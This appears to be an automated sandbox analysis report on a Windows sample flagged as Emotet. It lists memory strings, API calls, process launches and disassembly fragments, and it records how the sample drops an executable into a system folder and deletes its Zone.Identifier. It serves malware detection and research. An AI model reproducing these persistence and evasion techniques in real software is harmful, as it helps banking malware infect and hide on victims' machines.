                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000C.00000003.307826493.000001A004240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.307808213.000001A00425A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.307787026.000001A004263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000C.00000003.307794742.000001A004261000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.308182111.000001A004213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.308222451.000001A00423D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.307821900.000001A004245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.285967172.000001A004232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000C.00000002.308238435.000001A00424E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: dot3hc.exe, 00000003.00000002.483182974.000000000064A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000003.00000002.484278022.0000000002171000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.220853815.0000000002631000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.220137105.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.483728370.00000000020E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.220808157.00000000025E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.482905413.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.23cf697d5faf11a3ffdd271e1d301173.exe.2630000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.dot3hc.exe.2170000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02172730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile created: C:\Windows\SysWOW64\cleanmgr\Jump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile created: C:\Windows\SysWOW64\cleanmgr\Jump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile deleted: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_004098D7
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00408974
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02638180
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02631C70
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02637590
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212380E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02129D1E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212912E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_004098D7
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00408974
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02638180
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02631C70
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02637590
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212380E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02129D1E
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212912E
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_004098D7
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00408974
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02178180
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02171C70
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02177590
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: String function: 00408928 appears 53 times
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: String function: 00408928 appears 53 times
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: String function: 00408928 appears 53 times
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221221155.00000000029F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: 23cf697d5faf11a3ffdd271e1d301173.exe, 00000000.00000002.221055432.00000000027E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 23cf697d5faf11a3ffdd271e1d301173.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: classification engineClassification label: mal68.troj.evad.winEXE@19/13@0/3
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification,
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02174CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edbJump to behavior
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edbJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4660:120:WilError_01
                Source: 23cf697d5faf11a3ffdd271e1d301173.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: 23cf697d5faf11a3ffdd271e1d301173.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeProcess created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe 'C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeProcess created: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00402770 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,LoadLibraryA,GetProcAddress,GetCurrentProcess,VirtualAllocExNuma,DialogBoxParamA,
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00406030 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00408963 push ecx; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040AB90 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040AB90 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00406030 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_00408963 push ecx; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040AB90 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0040AB90 push eax; ret
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635E70 push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635E40 push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635EA0 push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635F70 push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635F20 push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635FB0 push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D70 push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D30 push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635D00 push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635DE0 push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02635DA0 push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127A0E push ecx; mov dword ptr [esp], 00008D73h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127A3E push ecx; mov dword ptr [esp], 00007473h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127ABE push ecx; mov dword ptr [esp], 0000E2ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127B0E push ecx; mov dword ptr [esp], 000084ADh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_02127B4E push ecx; mov dword ptr [esp], 0000460Eh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212789E push ecx; mov dword ptr [esp], 000021B4h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021278CE push ecx; mov dword ptr [esp], 00002C7Ch
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212790E push ecx; mov dword ptr [esp], 00008067h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212793E push ecx; mov dword ptr [esp], 000036B8h
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_0212797E push ecx; mov dword ptr [esp], 000025AAh
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeCode function: 0_2_021279DE push ecx; mov dword ptr [esp], 0000AEA2h
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00406030 push eax; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_00408963 push ecx; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_0040AB90 push eax; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_0040AB90 push eax; ret
                Source: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeCode function: 3_2_02175E40 push ecx; mov dword ptr [esp], 0000AEA2h

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeExecutable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeExecutable created and started: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exePE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeJump to behavior
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exePE file moved: C:\Windows\SysWOW64\cleanmgr\dot3hc.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\23cf697d5faf11a3ffdd271e1d301173.exeFile opened: C:\Windows\SysWOW64\cleanmgr\dot3hc.exe:Zone.Identifier read attributes | delete
